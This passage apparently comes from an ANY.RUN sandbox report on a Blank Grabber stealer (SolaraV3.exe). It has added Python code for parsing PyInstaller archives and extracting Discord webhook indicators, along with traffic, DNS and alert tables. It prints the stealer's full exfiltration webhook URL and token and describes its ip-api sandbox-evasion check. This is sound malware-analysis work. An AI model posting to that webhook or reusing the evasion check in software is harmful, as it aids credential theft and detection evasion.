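            hits.append((e["name"], "bundled executable: hash and check separately"))
    return hits


def build_sample_archive(stub: bytes, files) -> bytes:
    """Constructed test data: append a minimal CArchive (body, TOC, cookie) to a stub."""
    body = toc = b""
    for name, tcode, data, compress in files:
        payload = zlib.compress(data) if compress else data
        nb = name.encode()
        elen = TOC_HDR_SIZE + len(nb) + 1
        pad = -elen % 16                         # PyInstaller pads entries to 16 bytes
        toc += struct.pack(TOC_HDR_FMT, elen + pad, len(body), len(payload), len(data),
                           1 if compress else 0, tcode) + nb + b"\x00" * (pad + 1)
        body += payload
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, len(body) + len(toc) + COOKIE_SIZE,
                         len(body), len(toc), 312, b"python312.dll")
    return stub + body + toc + cookie


# Constructed sample mirroring the drop names in the report (contents are fake).
SAMPLE = build_sample_archive(b"MZ" + b"\x00" * 256, [
    ("pyimod01_archive", b"m", b"# loader module", True),
    ("blank", b"s", b"import loader", True),
    ("blank.aes", b"x", bytes(range(256)) * 16, False),   # every byte value equally often: entropy 8.0
    ("rar.exe", b"b", b"MZ" + b"\x90" * 300, True),
    ("python312.dll", b"b", b"MZ" + b"\x00" * 300, True),
])

if __name__ == "__main__":
    info = parse_pyinstaller(SAMPLE)
    print(f"Python {info['python']} ({info['pylib']}), {len(info['entries'])} entries")
    for name, why in triage(SAMPLE, info):
        print(f"  {name}: {why}")
```

On a real sample, read the file with open(path, "rb").read() and hand the bytes to parse_pyinstaller. Extracted script entries are marshalled code objects that still need a Python 3.12 decompiler, and blank.aes will not yield anything until the key is recovered from the loader script, so the entry script is the first thing to look at.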

Download PCAP, analyze network streams, HTTP content and a lot more at the full report.

HTTP(S) requests: 5 | TCP/UDP connections: 30 | DNS requests: 8


HTTP requests

Columns in the original table: PID, Process, Method, HTTP Code, IP, URL, CN, Type, Size, Reputation.

- (no PID/process recorded) GET 204 | 142.250.185.67:443 | https://gstatic.com/generate_204 | remaining column: unknown
- PID 2268 SolaraV3.exe | GET 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | remaining columns: unknown, unknown
- PID 7116 svchost.exe | GET 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | remaining columns: unknown, unknown
- PID 2268 SolaraV3.exe | GET 200 | 208.95.112.1:80 | http://ip-api.com/json/?fields=225545 | remaining columns: unknown, unknown
- (no PID/process recorded) POST 404 | 162.159.128.233:443 | https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc | CN: unknown | Type: binary | Size: 45 b | Reputation: unknown

What the traffic means: the gstatic generate_204 request is a connectivity check. The first ip-api.com call asks only for the hosting field, which returns a single true/false line; stealers use it as a cheap sandbox and VPS check before doing anything else. The second call, with a numeric field mask, pulls geolocation for the victim profile. The svchost.exe CRL download is Windows background activity, not the sample's. The Discord POST is the exfiltration attempt, and its 404 is Discord's response for a webhook that no longer exists, so the webhook had already been removed when this run took place and nothing was delivered. The webhook URL is still the most specific network indicator on the page.
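The ims-api section and the HTTP table above give the exfiltration channel: a single Discord webhook, to which the sample POSTed and got a 404. The snippet below is an added example, not ANY.RUN or Blank Grabber code. It pulls webhook URLs out of any text (a strings dump, a PCAP export, a config), dates the webhook from the timestamp embedded in its snowflake ID, and produces a redacted form safe to paste into a ticket; the sample text is constructed around the webhook printed in this report.

```python
"""Pull Discord webhook IOCs out of sample strings or captured traffic, date the
webhook from its snowflake ID and produce a shareable redacted form.
Added example; not ANY.RUN code and not Blank Grabber code."""
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1_420_070_400_000   # 2015-01-01T00:00:00Z, the snowflake epoch
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d{17,20})/([A-Za-z0-9_-]{50,100})")


def find_webhooks(text: str):
    """Unique (id, token) pairs in first-seen order."""
    seen, out = set(), []
    for m in WEBHOOK_RE.finditer(text):
        pair = (m.group(1), m.group(2))
        if pair not in seen:
            seen.add(pair)
            out.append(pair)
    return out


def decode_snowflake(snowflake: str) -> dict:
    """Discord snowflake layout: 42-bit ms timestamp | 5-bit worker | 5-bit process | 12-bit increment."""
    n = int(snowflake)
    ms = (n >> 22) + DISCORD_EPOCH_MS
    return {"created": datetime.fromtimestamp(ms / 1000, tz=timezone.utc),
            "worker": (n >> 17) & 0x1F, "process": (n >> 12) & 0x1F, "increment": n & 0xFFF}


def redact(webhook_id: str, token: str) -> str:
    """Keep the ID (harmless, it only dates the webhook) and the ends of the token."""
    return f"{webhook_id}/{token[:4]}...{token[-4:]}"


def info_url(webhook_id: str, token: str) -> str:
    """A GET on this URL returns the webhook's name, channel_id and guild_id with no
    other credential, which is why the token itself must be handled as a secret."""
    return f"https://discord.com/api/webhooks/{webhook_id}/{token}"


def report(text: str):
    rows = []
    for wid, tok in find_webhooks(text):
        sf = decode_snowflake(wid)
        rows.append({"id": wid, "redacted": redact(wid, tok),
                     "created_utc": sf["created"].strftime("%Y-%m-%d %H:%M:%S"),
                     "info_url": info_url(wid, tok)})
    return rows


# Constructed input: the webhook from this report, repeated once as it would be in a
# strings dump, plus a discord.com URL that is not a webhook and must be ignored.
SAMPLE_TEXT = """
POST https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
https://discord.com/api/v9/users/@me
"""

if __name__ == "__main__":
    for row in report(SAMPLE_TEXT):
        print(row["id"], row["created_utc"], row["redacted"])
```

The ID decodes to a creation time of 2024-09-01 UTC, two weeks before the PE link timestamp (2024-09-17) and four weeks before the analysis, which is typical of a throwaway grabber build. The token is a bearer secret: anyone holding it can read the webhook's metadata with a plain GET or post into the channel, so redact it before sharing and report the webhook to Discord rather than exercising it yourself.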


Connections

PID | Process | IP | Domain | ASN | CN | Reputation
7116 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3888 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
7116 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
7116 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2268 | SolaraV3.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown
2268 | SolaraV3.exe | 172.217.16.131:443 | gstatic.com | GOOGLE | US | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
2268 | SolaraV3.exe | 162.159.138.232:443 | discord.com | CLOUDFLARENET | - | unknown

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.124.78.146, 20.73.194.208 | whitelisted
google.com | 216.58.212.142 | whitelisted
www.microsoft.com | 95.101.149.131 | whitelisted
blank-3jsck.in | (no answer recorded) | unknown
ip-api.com | 208.95.112.1 | shared
gstatic.com | 172.217.16.131 | whitelisted
discord.com | 162.159.138.232, 162.159.135.232, 162.159.136.232, 162.159.128.233, 162.159.137.232 | whitelisted

blank-3jsck.in is the only lookup in the capture that is not Microsoft, Google, Discord or ip-api infrastructure; it did not resolve, so no connection followed it.

Threats

PID | Process | Class | Message
2256 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com)
2256 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com
2256 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com
2268 | SolaraV3.exe | A Network Trojan was detected | STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
2268 | SolaraV3.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI)
- | - | Successful Credential Theft Detected | SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt

No debug info
